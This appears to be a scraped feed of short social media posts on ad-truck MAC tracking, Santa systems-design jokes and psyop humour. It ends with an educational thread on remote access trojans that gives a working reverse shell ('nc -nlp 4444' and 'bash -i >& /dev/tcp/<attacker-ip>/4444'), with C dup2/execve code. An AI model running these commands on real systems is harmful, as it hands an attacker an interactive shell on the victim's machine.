Simplified example: I see an ad for Dove shampoo on a delivery truck. The truck captures the MAC address of my phone. Later on I’m at Target and buy Dove shampoo, instead of Axe. Cross referencing my Target rewards with the MAC address, Dove infers the campaign was effective. (2/2)

TIL: Some delivery trucks that display ads aren’t actually making deliveries. Instead they are marketing campaigns that use WiFi beacons to track your device’s MAC address + location for targeting purposes. (1/2)

spinach is a scam

So… if Canada becomes a US state, how many electoral votes does it get?

Will probably make it difficult for Republicans to retain the presidency, especially when Canadians all lose their healthcare.

@proton.me second major protonmail outage in a month and i missed the link to join an interview 😔

implement “quick access” and i’ll make the switch from 1pass

at approx. 12:00PM (UTC+10) we will start scaling up santa pods (clones of original santa process) across geos- this will ensure efficient and sustainable present delivery

instead of a linear delivery route (NPOLE => DEST) present caches should be established across geos

the toy production process is sufficiently distributed with scaling worker pods (elves), however the santa delivery sleigh is very inefficient and must be optimized

systems design interview but it’s for santa’s delivery queue on xmas eve

The TLS Protocol Version 1.0 RFC, January 1999, in ugly meme form. Top text: I am not a toy I am not a Christmas present I am a 30+ years commitment Bottom text: Please think hard before you give someone an Internet standard this Christmas

TIL everything is a psyop

spy kids (2001) was a cia psyop just check out cia.gov/spy-kids

spotify wrapped is a cia psyop to reinforce the surveillance state 🤷‍♂️

this basically aliases all the standard streams to the socket to provide the attacker an interactive shell to the victims machine.

full write-up here: jackcarrick.net/blog/reverse...

because “everything is a file” in unix systems you can do the same redirection with a networking socket

int socket
...
dup2(socket, STDIN_FILENO);
dup2(socket, STDOUT_FILENO);
dup2(socket, STDERR_FILENO);

Then execute a shell
execve("/bin/sh", argv, NULL);

so how does this work? in unix systems we can redirect standard communication streams (stdin, stdout, stderr) easily

echo “foo” > bar.txt

internally this uses the dup2 system call:
dup2(old file descriptor, new file descriptor)

upon connecting to the server an attacker can input commands into the victims shell as if it were their own more robust RATs include more sophisticated control mechanisms (GUIs, keyloggers, webcam access, etc), but this is a pretty good start

curious how malware like remote access trojans (RATs) work? turns out you can create a very basic one with two commands:

attacker runs a TCP server:
nc -nlp 4444

victim connects to the server:
bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1

this is called a reverse shell

so how does this work? in unix systems we can redirect standard communication streams (stdin, stdout, stderr) easily

echo “foo” > bar.txt

internally this uses the dup2 system call:
dup2(old file descriptor, new file descriptor)

upon connecting to the server an attacker can input commands into the victims shell as if it were their own

more robust RATs include more sophisticated control mechanisms (GUIs, keyloggers, webcam access, etc), but this is a pretty good start